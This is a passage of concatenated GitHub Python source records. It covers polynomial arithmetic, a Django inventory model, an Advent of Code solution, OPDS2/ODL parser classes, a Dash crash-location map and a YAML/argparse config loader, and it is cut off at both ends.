b.coef_deg[bpos][1]:\n            z.append([a.coef_deg[apos][0], a.coef_deg[apos][1]])\n            apos += 1\n        # if a and b have the same exponent\n        elif a.coef_deg[apos][1] == b.coef_deg[bpos][1]:\n            z.append([a.coef_deg[apos][0] + b.coef_deg[bpos][0], a.coef_deg[apos][1]])\n            apos += 1\n            bpos += 1\n        # if b's exponent is higher\n        else:\n            z.append([b.coef_deg[bpos][0], b.coef_deg[bpos][1]])\n            bpos += 1\n    return polynomial(z)\n\ndef poly_mult(a, b):\n    z = [] # list that holds the product terms\n    z_list = [] # exponents already present in z\n    degree_a = a.degree # number of terms in polynomial a\n    degree_b = b.degree # number of terms in polynomial b\n\n    for i in range(degree_a):\n        for j in range(degree_b):\n            # store the product temporarily in the same term format\n            temp = [a.coef_deg[i][0]*b.coef_deg[j][0], a.coef_deg[i][1]+b.coef_deg[j][1]]\n            if temp[1] in z_list: # if the same exponent already exists\n                for k in range(len(z)):\n                    # add to the coefficient of that exponent\n                    if z[k][1] == temp[1]:\n                        z[k][0] += temp[0]\n            else: # if the exponent is new\n                z.append(temp) # append the temporary term to z\n                z_list.append(temp[1]) # and record that this exponent now exists\n\n    return polynomial(z)\n\n\n# Read expressions 1 and 2\nprint(\"Enter expression 1: \", end='')\nexp1 = list(map(int, input().split()))\ntemp1 = []\nfor i in range(len(exp1)//2):\n    temp1.append([exp1[i*2],exp1[i*2+1]])\na = polynomial(temp1)\n\nprint(\"Enter expression 2: \", end='')\nexp2 = list(map(int, input().split()))\ntemp2 = []\nfor i in range(len(exp2)//2):\n    temp2.append([exp2[i*2],exp2[i*2+1]])\nb = polynomial(temp2)\n\n# Run the operations on expressions 1 and 2\nc = poly_add(a, b)\nd = poly_mult(a, b)\nprint(\"Expression 1+2 is \", end='')\nc.print_poly()\nprint(\"Expression 1*2 is \", end='')\nd.print_poly()\nprint()\n\n# Evaluate the expressions after printing them\npoly_list = [a, b, c, d] # keep the four polynomials together for easy lookup\nwhile True:\n    print(\"Plug a value into an 
(ex: 1 1) \", end='')\n    n, m = map(int, input().split())\n    result = 0\n    if n >= 1 and n <= 4:\n        result = poly_list[n-1].calc_poly(m)\n        print(\"The result is %d\" % (result))\n    else:\n        print(\"Invalid input.\")","repo_name":"nyeok98/2021_CS","sub_path":"Data Structure/과제1_20172674_신동녘/소스코드/polynomial_2.py","file_name":"polynomial_2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32070725199","text":"import os\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\nfrom membership_file.models import Member\n\n\n__all__ = [\"valid_item_class_ids\", \"Ownership\", \"Item\", \"MiscellaneousItem\"]\n\n\nclass ItemManager(models.Manager):\n    \"\"\"Manager for any object related to Item. Replaces standard manager in .objects\"\"\"\n\n    def get_all_in_possession(self):\n        \"\"\"Returns all items currently in possession (owned or borrowed)\"\"\"\n        content_type = ContentType.objects.get_for_model(self.model)\n        ownerships = Ownership.objects.filter(content_type=content_type, is_active=True)\n        return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n    def get_all_owned(self):\n        \"\"\"Returns all items owned by the association\"\"\"\n        content_type = ContentType.objects.get_for_model(self.model)\n        ownerships = Ownership.objects.filter(content_type=content_type, is_active=True, group__isnull=False)\n        return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n    def get_all_owned_by(self, member=None, group=None):\n        \"\"\"Returns all items that are owned by the defined party\"\"\"\n        assert member or group\n\n        content_type = ContentType.objects.get_for_model(self.model)\n        ownerships = Ownership.objects.filter(content_type=content_type, is_active=True)\n        if member:\n            ownerships = ownerships.filter(member=member)\n        if group:\n            ownerships = ownerships.filter(group=group)\n        return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n\n# File path to upload achievement images to\ndef get_item_image_upload_path(instance, filename):\n    # Obtain extension\n    # NB: A file can be renamed to have ANY extension\n    _, extension = os.path.splitext(filename)\n\n    item_name = f\"{instance.id}-{slugify(instance.name)}\"\n\n    # file will be uploaded to MEDIA_ROOT / images/item/<type_str>/<item_name><extension>\n    return \"images/item/{type_str}/{item_name}{extension}\".format(\n        type_str=slugify(instance.__class__.__name__),\n        item_name=item_name,\n        extension=extension,\n    )\n\n\nclass Item(models.Model):\n    \"\"\"Item in the inventory system. 
Abstract root class.\n\n    On permissions:\n    There are several unique default permissions used for Items\n    add_group_ownership_for_: Allows users to add new ownerships to groups they are part of\n    add_member_ownership_for_: Allows users to add new ownerships to any active member\n    maintain_ownerships_for_: Adds additional control rights\n\n    Furthermore, the default permissions edit_ and delete_ are also used in the front-end\n\n    This grants access to assigning items to groups or members respectively\n\n    \"\"\"\n\n    name = models.CharField(max_length=128)\n    description = models.TextField(max_length=512, blank=True, null=True)\n    image = models.ImageField(upload_to=get_item_image_upload_path, blank=True, null=True)\n\n    icon_class = None  # CSS classes for the icon\n\n    ownerships = GenericRelation(\"inventory.Ownership\")\n    # An achievement can also apply to roleplay items\n    achievements = GenericRelation(\"achievements.AchievementItemLink\")\n\n    objects = ItemManager()\n\n    class Meta:\n        abstract = True\n        ordering = (\"name\",)\n\n        # Set the default permissions. Each item has a couple of additional default permissions\n        default_permissions = (\n            \"add\",\n            \"change\",\n            \"delete\",\n            \"view\",\n            \"add_group_ownership_for\",\n            \"add_member_ownership_for\",\n            \"maintain_ownerships_for\",\n        )\n\n    @classmethod\n    def get_item_contenttypes(cls):\n        \"\"\"Returns all contenttypes for all items\"\"\"\n        content_types = []\n        for item_class in cls.__subclasses__():\n            content_types.append(ContentType.objects.get_for_model(item_class))\n        return content_types\n\n    def currently_in_possession(self):\n        \"\"\"Returns all ownership items that are currently at the Knights\"\"\"\n        return self.ownerships.filter(is_active=True)\n\n    def is_owned_by_association(self):\n        \"\"\"Returns boolean stating whether this item is owned by the association\"\"\"\n        return self.ownerships.filter(is_active=True).filter(group__isnull=False).exists()\n\n    def is_loaned_by_member(self):\n        \"\"\"Returns boolean stating whether this item is currently on loan from a member\"\"\"\n\n        return self.ownerships.filter(is_active=True).filter(member__isnull=False).exists()\n\n    def __str__(self):\n        return f\"{self.__class__.__name__}: {self.name}\"\n\n    def other_fields(self):\n        \"\"\"Returns a list of dicts with the model fields that are not defined in Item\"\"\"\n        other_fields = []\n        exclude_names = (\"id\", \"name\", \"description\", \"image\")\n        for field in self._meta.local_fields:\n            if field.name not in exclude_names:\n                field_dict = {\n                    \"name\": field.name,\n                    \"verbose_name\": field.verbose_name,\n                    \"value\": getattr(self, field.name),\n                }\n                # Set a value in case there are choices\n                if hasattr(self, f\"get_{field.name}_display\"):\n                    field_dict[\"display_value\"] = getattr(self, f\"get_{field.name}_display\")()\n\n                other_fields.append(field_dict)\n        return other_fields\n\n\ndef valid_item_class_ids():\n    \"\"\"Returns a query parameter for ids of valid Item classes. 
Used for Ownership Content type validity\"\"\"\n    valid_ids = []\n    for content_type in Item.get_item_contenttypes():\n        valid_ids.append(content_type.id)\n    return {\"id__in\": valid_ids}\n\n\nclass Ownership(models.Model):\n    member = models.ForeignKey(Member, on_delete=models.CASCADE, null=True, blank=True)\n    group = models.ForeignKey(Group, on_delete=models.PROTECT, null=True, blank=True)\n\n    added_since = models.DateField(default=timezone.now)\n    added_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n    is_active = models.BooleanField(default=True, help_text=\"Whether item is currently at the Knights\")\n    note = models.TextField(max_length=256, blank=True, null=True)\n    value = models.DecimalField(\n        max_digits=5, decimal_places=2, null=True, blank=True, verbose_name=\"initial purchase value\"\n    )\n\n    # The owned item\n    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, limit_choices_to=valid_item_class_ids)\n    object_id = models.PositiveIntegerField()\n    content_object = GenericForeignKey(\"content_type\", \"object_id\")\n\n    @property\n    def owner(self):\n        \"\"\"Returns the owner of the item\"\"\"\n        if self.member:\n            return self.member\n        else:\n            return self.group\n\n    def clean_fields(self, exclude=None):\n        super().clean_fields(exclude=exclude)\n        # Make exclude a list to prevent complex if statements\n        exclude = exclude or []\n\n        if \"content_type\" not in exclude and \"object_id\" not in exclude:\n            if self.content_object is None:\n                raise ValidationError(\"The connected item does not exist\", code=\"item_nonexistent\")\n\n    def clean(self):\n        super(Ownership, self).clean()\n        # Validate that EITHER member or group must be defined\n        if self.member is None and self.group is None:\n            raise ValidationError(\"Either a member or a group has to be defined\", code=\"required\")\n        if self.member and self.group:\n            raise ValidationError(\"An item can't belong both to a user and a group\", code=\"invalid\")\n\n    def __str__(self):\n        if self.member:\n            return f\"{self.content_object} supplied by {self.member}\"\n        else:\n            return f\"{self.content_object} owned ({self.group})\"\n\n\nclass MiscellaneousItem(Item):\n    icon_class = \"fas fa-box\"\n","repo_name":"esrg-knights/Squire","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41169682475","text":"#!/opt/conda/bin/python\n# -*- coding: utf-8 -*-\n\nimport argparse\nfrom answer_pipeline.answer_main_pipeline import answer_main_pipeline\n\ndef parse_args():\n    \"\"\"\n    Parse input positional arguments from command line\n    :return: args - parsed arguments\n    \"\"\"\n    parser = argparse.ArgumentParser('answer')\n    parser.add_argument('article_fpath', help='Path to your article.', type=str)\n    parser.add_argument('questions_fpath', help='Path to your questions.', type=str)\n    args = parser.parse_args()\n    return args\n\nif __name__=='__main__':\n    # ./answer article.txt questions.txt\n    args = parse_args()\n    article_fpath = args.article_fpath\n    questions_fpath = args.questions_fpath\n    with open(article_fpath,\"r\") as f:\n        doc=f.read()\n    with open(questions_fpath,\"r\") as f:\n        questions=f.readlines()\n    answers = answer_main_pipeline(doc,questions)\n    for i in answers:\n        print(i[0][0])\n    
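Editorial aside, not part of the dataset: the `Ownership.clean()` method in the inventory record above enforces that exactly one of `member`/`group` is set. A minimal framework-free sketch of that rule; the helper name and sample values are made up for illustration:

```python
# Mirror of the member-XOR-group validation in Ownership.clean() above,
# without Django, so it can run standalone.
def validate_owner(member, group):
    if member is None and group is None:
        raise ValueError("Either a member or a group has to be defined")
    if member and group:
        raise ValueError("An item can't belong both to a user and a group")
    return member or group  # same idea as the Ownership.owner property

print(validate_owner("alice", None))   # alice
try:
    validate_owner(None, None)
except ValueError as exc:
    print(exc)                         # Either a member or a group has to be defined
```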
pass","repo_name":"yuxin-yao/QASystem","sub_path":"confucius_v2/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7630751719","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\nimport csv\n\nauthor = '© Kariyushi Rao, 2018'\n\ndoc = \"\"\"\nParticipants respond to basic demographics questions, self-report their relative knowledge of the stock\nmarket and their gambling frequency, describe the strategy they used in the experiment, report whether\nthey find the stimuli suspicious, and provide open response comments about their experience. \n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'last_page'\n players_per_group = None\n num_rounds = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n age = models.PositiveIntegerField()\n gender = models.IntegerField(\n choices=[[0, 'Male'],[1, 'Female'], [2, 'Other']],\n widget=widgets.RadioSelect\n )\n highest_degree = models.IntegerField(\n choices=[[1, 'No Degree'],[2, 'High School Diploma'], \n [3, '2-Year College Degree or Skilled Trade Program'], [4, '4-year College Degree'],\n # NOTE: Masters + value was miscoded as 4 in \"A\" versions of the experiments. \n # Error was fixed in \"B\" versions, but all Masters + responses were coded as \"4\"\n # in the analyses to allow for comparison between \"A\" and \"B\" experimental data.\n [5, 'Masters Degree or Higher']],\n widget=widgets.RadioSelect\n )\n stocks = models.IntegerField(\n choices=[[1, 'Better Than Average'],[0, 'About Average'], [-1, 'Worse Than Average']],\n widget=widgets.RadioSelect\n )\n gambling = models.IntegerField(\n choices=[[1, 'More Than Average'],[0, 'About Average'], [-1, 'Less Than Average']],\n widget=widgets.RadioSelect\n )\n strategy = models.TextField()\n suspicion = models.TextField()\n comments = models.TextField()\n","repo_name":"kariyushirao/predicting_outcomes","sub_path":"demographics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38045572968","text":"# https://adventofcode.com/2021/day/9\n\nfrom functools import reduce\n\ntest = \"2021-09_sample.txt\"\nrun = \"2021-09_input.txt\"\n\ndef part1(fname):\n sum = 0\n data = [[int(x) for x in list(line.rstrip())] for line in open(fname)]\n h = len(data)\n w = len(data[0])\n for i in range(h):\n for j in range(w):\n if i > 0 and data[i][j] >= data[i-1][j]:\n continue\n if i < h-1 and data[i][j] >= data[i+1][j]:\n continue\n if j > 0 and data[i][j] >= data[i][j-1]:\n continue\n if j < w-1 and data[i][j] >= data[i][j+1]:\n continue\n sum += data[i][j] + 1 \n #print(f'{i},{j} : {data[i][j]} {sum}')\n return sum\n\ndef part2(fname):\n basin_sizes = []\n connected = {}\n data = [[int(x) for x in list(line.rstrip())] for line in open(fname)]\n basin_map = [[0] * len(data[0]) for _ in range(len(data))]\n for i in range(len(data)):\n for j in range(len(data[0])):\n if data[i][j] == 9:\n basin_id = 0\n else:\n left = basin_map[i-1][j] if i > 0 else 0\n up = basin_map[i][j-1] if j > 0 else 0\n if left == 0 and up == 0:\n basin_id = len(basin_sizes) + 1\n basin_sizes.append(0)\n else:\n basin_id = max((left, up)) if left == 0 or up == 0 else min((left, up))\n while basin_id in connected:\n 
basin_id = connected[basin_id]\n if left != 0 and left != basin_id:\n connected[left] = basin_id\n if up != 0 and up != basin_id:\n connected[up] = basin_id\n basin_sizes[basin_id - 1] += 1\n basin_map[i][j] = basin_id\n #print(f'basin sizes: {basin_sizes}')\n for i in range(len(basin_sizes)-1, -1, -1):\n if i+1 in connected:\n basin_id = connected[i+1]\n basin_sizes[basin_id - 1] += basin_sizes[i]\n basin_sizes[i] = 0\n #print(f'basin sizes: {basin_sizes}')\n #print(connected)\n #for line in basin_map:\n # print(''.join([f'{n:3d}' if n not in connected else f'{connected[n]:3d}' for n in line]))\n return reduce(lambda a, b: a*b, sorted(basin_sizes)[-3:])\n\nassert part1(test) == 15\nprint(f'part1: {part1(run)}')\n\nassert part2(test) == 1134\nprint(f'part2: {part2(run)}')\n","repo_name":"esc2345/advent_of_code","sub_path":"2021/2021-09.py","file_name":"2021-09.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36094341296","text":"import datetime\n\nfrom webpub_manifest_parser.core.ast import (\n ArrayOfCollectionsProperty,\n ArrayOfLinksProperty,\n Collection,\n CollectionList,\n Node,\n)\nfrom webpub_manifest_parser.core.properties import (\n ArrayOfStringsProperty,\n BooleanProperty,\n DateOrTimeProperty,\n NumberProperty,\n TypeProperty,\n URIProperty,\n)\nfrom webpub_manifest_parser.odl.registry import ODLCollectionRolesRegistry\nfrom webpub_manifest_parser.opds2.ast import OPDS2Feed, OPDS2Price, OPDS2Publication\nfrom webpub_manifest_parser.opds2.registry import OPDS2CollectionRolesRegistry\nfrom webpub_manifest_parser.utils import is_string\n\n\nclass ODLLicenseTerms(Node):\n \"\"\"ODL license terms & conditions.\"\"\"\n\n checkouts = NumberProperty(\"checkouts\", required=False)\n expires = DateOrTimeProperty(\"expires\", required=False)\n concurrency = NumberProperty(\"concurrency\", required=False)\n length = NumberProperty(\"length\", required=False)\n\n\nclass ODLLicenseProtection(Node):\n \"\"\"ODL license protection information.\"\"\"\n\n formats = ArrayOfStringsProperty(\"format\", required=False)\n devices = NumberProperty(\"devices\", required=False)\n copy_allowed = BooleanProperty(\"copy\", required=False)\n print_allowed = BooleanProperty(\"print\", required=False)\n tts_allowed = BooleanProperty(\"tts\", required=False)\n\n\nclass ODLLicenseMetadata(Node):\n \"\"\"ODL license metadata.\"\"\"\n\n identifier = URIProperty(\"identifier\", required=True)\n formats = ArrayOfStringsProperty(\"format\", required=True)\n created = DateOrTimeProperty(\"created\", required=True)\n terms = TypeProperty(\n \"terms\",\n required=False,\n nested_type=ODLLicenseTerms,\n )\n protection = TypeProperty(\n \"protection\",\n required=False,\n nested_type=ODLLicenseProtection,\n )\n price = TypeProperty(\n \"price\",\n required=False,\n nested_type=OPDS2Price,\n )\n source = URIProperty(\"source\", required=False)\n\n def __init__(self, identifier=None, formats=None, created=None):\n \"\"\"Initialize a new instance of ODLLicenseMetadata class.\n\n :param identifier: License's identifier\n :type identifier: str\n\n :param formats: List of license formats\n :type formats: List[str]\n\n :param created: Time when the license was created\n :type created: datetime.datetime\n \"\"\"\n super().__init__()\n\n if identifier and not is_string(identifier):\n raise ValueError(\"Argument 'identifier' must be a string\")\n if formats and not isinstance(formats, list):\n raise ValueError(\"Argument 
'formats' must be a list\")\n        if created and not isinstance(created, datetime.datetime):\n            raise ValueError(\n                f\"Argument 'created' must be an instance of {datetime.datetime}\"\n            )\n\n        self.identifier = identifier\n        self.formats = formats\n        self.created = created\n\n\nclass ODLLicense(Collection):\n    \"\"\"ODL license subcollection.\"\"\"\n\n    metadata = TypeProperty(\"metadata\", required=True, nested_type=ODLLicenseMetadata)\n\n    def __hash__(self):\n        \"\"\"Calculate the hash.\n\n        :return: Hash\n        :rtype: int\n        \"\"\"\n        return hash((self.metadata, self.links))\n\n\nclass ODLPublication(OPDS2Publication):\n    \"\"\"ODL publication.\"\"\"\n\n    links = ArrayOfLinksProperty(key=\"links\", required=False)\n    licenses = ArrayOfCollectionsProperty(\n        \"licenses\",\n        required=False,\n        role=ODLCollectionRolesRegistry.LICENSES,\n        collection_type=ODLLicense,\n    )\n\n    def __init__(self, metadata=None, links=None, images=None, licenses=None):\n        \"\"\"Initialize a new instance of ODLPublication class.\n\n        :param metadata: Publication's metadata\n        :type metadata: webpub_manifest_parser.core.ast.Metadata\n\n        :param links: List of publication's links\n        :type links: LinkList\n\n        :param images: List of publication's images\n        :type images: LinkList\n\n        :param licenses: List of publication's licenses\n        :type licenses: CollectionList\n        \"\"\"\n        super().__init__(metadata, links, images)\n\n        if licenses and not isinstance(licenses, CollectionList):\n            raise ValueError(\n                f\"Argument 'licenses' must be an instance of {CollectionList}\"\n            )\n\n        self.licenses = licenses\n\n    def __hash__(self):\n        \"\"\"Calculate the hash.\n\n        :return: Hash\n        :rtype: int\n        \"\"\"\n        return hash((super().__hash__(), self.licenses))\n\n\nclass ODLFeed(OPDS2Feed):\n    \"\"\"ODL 2.x feed.\"\"\"\n\n    publications = ArrayOfCollectionsProperty(\n        \"publications\",\n        required=False,\n        role=OPDS2CollectionRolesRegistry.PUBLICATIONS,\n        collection_type=ODLPublication,\n    )\n","repo_name":"ThePalaceProject/webpub-manifest-parser","sub_path":"src/webpub_manifest_parser/odl/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2380105839","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objs as go\n\n\ndf = pd.read_csv('../Car_Crash/Data/Crash.csv', skipinitialspace=True)\ndf = df[~df['Postal'].isnull()]\n# convert zip code into strings\ndf.Postal = df.Postal.astype(int).astype(str)\ndf.Postal = df.Postal.apply(lambda x: x if len(x) == 5 else '0'+x)\n\nmapbox_access_token = 'pk.eyJ1IjoidWlyc2VpdGEiLCJhIjoiY2pwaGx4eXQ0MDAwdTNxcX' \\\n                      'dwMGo0cGpxdiJ9.ux2pBATNhOgnghsvMFbQvw'\ncolumn_list = ['Crash_Record_Number',\n               'County_Name',\n               'Crash_Year',\n               'Weather',\n               'Road_Condition',\n               'Collision_Type',\n               'Latitude_(Decimal)',\n               'Longitude_(Decimal)',\n               'Postal']\ndf1 = df[column_list]\ndf1['Collision_Type'] = df1['Collision_Type'].astype('category')\ndf1['Collision_Type_color'] = df1['Collision_Type'].cat.codes\ndf1['Collision_Type_color'] = df1['Collision_Type_color'] / (\n    len(df1['Collision_Type_color'].unique().tolist()) - 1)\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ncrash_type_list = df1.Collision_Type.unique().tolist()\nyear_list = df1.Crash_Year.sort_values().unique().tolist()\n\napp.layout = html.Div([\n    html.Div([\n        html.Div([\n            dcc.Dropdown(\n                
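Editorial aside, not part of the dataset: `ODLLicenseMetadata.__init__` in the record above type-checks its arguments before assignment. A dependency-free sketch of the same validation pattern; the helper name and sample identifier are made up:

```python
# Mirror of the argument checks in ODLLicenseMetadata.__init__ above.
import datetime

def check_license_args(identifier, formats, created):
    if identifier is not None and not isinstance(identifier, str):
        raise ValueError("Argument 'identifier' must be a string")
    if formats is not None and not isinstance(formats, list):
        raise ValueError("Argument 'formats' must be a list")
    if created is not None and not isinstance(created, datetime.datetime):
        raise ValueError(
            f"Argument 'created' must be an instance of {datetime.datetime}"
        )

check_license_args("urn:uuid:123", ["application/epub+zip"], datetime.datetime(2024, 1, 1))
try:
    check_license_args("urn:uuid:123", "epub", None)   # formats must be a list
except ValueError as exc:
    print(exc)
```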
id='crash_type',\n options=[{'label': i, 'value': i} for i in crash_type_list],\n value=crash_type_list,\n multi=True\n ),\n dcc.Dropdown(\n id='year',\n options=[{'label': i, 'value': i} for i in year_list],\n value=year_list,\n multi=True\n )\n ], style={'width': '20%', 'display': 'inline-block'})\n ]),\n\n dcc.Graph(id='indicator-graphic')\n])\n\n\n@app.callback(\n dash.dependencies.Output('indicator-graphic', 'figure'),\n [dash.dependencies.Input('crash_type', 'value'),\n dash.dependencies.Input('year', 'value')])\ndef update_graph(crash_type, year):\n scl = [[0, \"rgb(229, 0, 14)\"], [1 / 9, \"rgb(231, 63, 2)\"],\n [2 / 9, \"rgb(233, 142, 5)\"], [3 / 9, \"rgb(235, 220, 8)\"],\n [4 / 9, \"rgb(177, 237, 11)\"], [5 / 9, \"rgb(104, 239, 14)\"],\n [6 / 9, \"rgb(0, 0, 0)\"], [7 / 9, \"rgb(32, 241, 17)\"],\n [8 / 9, \"rgb(23, 245, 156)\"], [1, \"rgb(27, 248, 232)\"]]\n plot_df = df1\n plot_df = plot_df[plot_df['Collision_Type'].isin(crash_type)]\n plot_df = plot_df[plot_df['Crash_Year'].isin(year)]\n\n # the maximum number of points on the mapbox object is 40K\n if plot_df.shape[0] > 40000:\n plot_df = plot_df.sample(n=40000, replace=False, random_state=1)\n\n data = [\n go.Scattermapbox(\n lon=plot_df['Longitude_(Decimal)'],\n lat=plot_df['Latitude_(Decimal)'],\n text=plot_df['Collision_Type'],\n mode='markers',\n marker=dict(\n size=5,\n opacity=0.7,\n autocolorscale=False,\n colorscale=scl,\n color=plot_df['Collision_Type_color'],\n ),\n )\n ]\n\n layout = go.Layout(\n autosize=True,\n hovermode='closest',\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=dict(\n lat=41,\n lon=-77\n ),\n pitch=0,\n zoom=6\n ),\n )\n\n return go.Figure(data=data, layout=layout)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Uirseita/DATA1030_Project_2","sub_path":"interactive_visualization/crash_type_by_location_and_year_on_map.py","file_name":"crash_type_by_location_and_year_on_map.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23186766346","text":"#!/usr/bin/env python\n\n__author__ = 'Gideon Bar'\n\nimport os\nimport argparse\nimport yaml\nfrom collections import namedtuple\nimport logging\n\nfrom wielder.util.arguer import LogLevel, convert_log_level\nfrom wielder.util.log_util import setup_logging\n\n\nclass Conf:\n\n def __init__(self):\n\n self.template_ignore_dirs = []\n\n def attr_list(self, should_print=False):\n\n items = self.__dict__.items()\n if should_print:\n\n logging.debug(\"Conf items:\\n______\\n\")\n [logging.debug(f\"attribute: {k} value: {v}\") for k, v in items]\n\n return items\n\n\ndef get_datalake_parser():\n\n parser = argparse.ArgumentParser(description=\n 'Data Orchestration Reactive Framework.')\n\n parser.add_argument(\n '-cf', '--conf_file',\n type=str,\n help='Full path to config file with all arguments.\\nCommandline args override those in the file.'\n )\n\n parser.add_argument(\n '-pl', '--plan',\n type=bool,\n default=False,\n help='plan means to create template instances/files but not deploy them e.g. 
conf.yml.tmpl => conf.yml.'\n    )\n\n    parser.add_argument(\n        '-e', '--env',\n        type=str,\n        default='qe',\n        help='Deployment environment; local means dev and refers to git branches ...'\n    )\n\n    parser.add_argument(\n        '-re', '--runtime_env',\n        type=str,\n        default='local-docker',\n        help='Runtime environment, e.g. local-docker, local, gcp, gcp-shared-vpc etc...'\n    )\n\n    parser.add_argument(\n        '-cpr', '--cloud_provider',\n        type=str,\n        choices=['gcp', 'aws', 'azure'],\n        help='Cloud provider; only meaningful if not local'\n    )\n\n    parser.add_argument(\n        '-edb', '--enable_debug',\n        type=bool,\n        help='Enable debug ports for remote debugging'\n    )\n\n    parser.add_argument(\n        '-ll', '--log_level',\n        type=LogLevel,\n        choices=list(LogLevel),\n        help='LogLevel: as in Python logging',\n        default=LogLevel.INFO\n    )\n\n    return parser\n\n\ndef extract_gcp_to_conf(conf):\n\n    raw = conf.raw_config_args['gcp']\n\n    gcp = Conf()\n\n    gcp.gcp_project = raw['project']\n    gcp.gcp_image_repo_zone = raw['image_repo_zone']\n    gcp.is_shared_vpc = raw['is_shared_vpc']\n    gcp.region = raw['region']\n    gcp.zone = raw['zone']\n    gcp.image_repo_zone = raw['image_repo_zone']\n    gcp.service_accounts = raw['service_accounts']\n    gcp.network = raw['network']\n    gcp.subnetwork = raw['subnetwork']\n\n    conf.gcp = gcp\n\n    gcp_services = raw['services']\n\n    if 'dataproc' in gcp_services:\n\n        raw_dataproc = gcp_services['dataproc']\n        dataproc = Conf()\n        dataproc.high_availability = raw_dataproc['high_availability']\n        dataproc.extra_tags = raw_dataproc['extra_tags']\n        dataproc.region = raw_dataproc['region']\n        dataproc.zone = raw_dataproc['zone']\n        dataproc.internal_ip_only = raw_dataproc['internal_ip_only']\n        dataproc.master_machine_type = raw_dataproc['master_machine_type']\n        dataproc.worker_machine_type = raw_dataproc['worker_machine_type']\n        dataproc.master_boot_disk_size = raw_dataproc['master_boot_disk_size']\n        dataproc.worker_boot_disk_size = raw_dataproc['worker_boot_disk_size']\n        dataproc.num_worker_nodes = raw_dataproc['num_worker_nodes']\n\n        conf.gcp.dataproc = dataproc\n    \n\ndef process_args(cmd_args):\n\n    if cmd_args.conf_file is None:\n\n        dir_path = os.path.dirname(os.path.realpath(__file__))\n\n        cmd_args.conf_file = dir_path + '/data_conf.yaml'\n\n    log_level = convert_log_level(cmd_args.log_level)\n\n    logging.basicConfig(\n        format='%(asctime)s %(levelname)s :%(message)s',\n        level=log_level,\n        datefmt='%m/%d/%Y %I:%M:%S %p'\n    )\n\n    with open(cmd_args.conf_file, 'r') as yaml_file:\n        conf_args = yaml.load(yaml_file, Loader=yaml.FullLoader)\n\n    if not hasattr(conf_args, 'plan'):\n        conf_args['plan'] = False\n\n    logging.debug('Configuration File Arguments:')\n\n    config_items = cmd_args.__dict__.items()\n\n    for k, v in config_items:\n\n        if v is not None:\n            conf_args[k] = v\n\n    named_tuple = namedtuple(\"Conf1\", conf_args.keys())(*conf_args.values())\n\n    conf = Conf()\n\n    conf.plan = named_tuple.plan\n    conf.conf_file = named_tuple.conf_file\n    conf.deploy_env = named_tuple.deploy_env\n    conf.enable_debug = named_tuple.enable_debug\n    conf.enable_dev = named_tuple.enable_dev\n    conf.deploy_strategy = named_tuple.deploy_strategy\n    conf.supported_deploy_envs = named_tuple.supported_deploy_envs\n    conf.cloud_provider = named_tuple.cloud_provider\n    conf.template_ignore_dirs = named_tuple.template_ignore_dirs\n    conf.template_variables = named_tuple.template_variables\n    conf.script_variables = named_tuple.script_variables\n\n    conf.git_super_repo = named_tuple.git_super_repo\n    conf.git_branch = named_tuple.git_branch\n    conf.git_commit = 
named_tuple.git_commit\n\n conf.raw_config_args = conf_args\n\n if conf.cloud_provider == 'gcp':\n\n extract_gcp_to_conf(conf)\n\n conf.attr_list(True)\n\n return conf\n\n\nif __name__ == \"__main__\":\n\n setup_logging(log_level=logging.DEBUG)\n\n datalake_args, other_args = get_datalake_parser().parse_known_args()\n\n _conf = process_args(datalake_args)\n\n logging.debug('break point')\n\n logging.info(f\"datalake_args:\\n{datalake_args}\\n\")\n logging.info(f\"other_args:\\n{other_args}\")\n\n\n\n\n\n","repo_name":"hamshif/Wielder","sub_path":"wielder/util/data_conf.py","file_name":"data_conf.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23890575164","text":"import sys\nfrom collections import defaultdict\n\ninput= sys.stdin.readline\n\ndef sol(x : int) -> int:\n nnn = x //100\n nn = (x-100*nnn)//10\n n = x % 10\n if nn == (n+nnn)/2:\n return x\n \n\n\nn = int(input())\ntemp = 0\n\nlist = [x for x in range(1,100)]\n\nif n < 100:\n print(n)\nelse:\n for i in range(100,n+1):\n temp = sol(i)\n if type(temp) == int:\n list.append(temp)\n 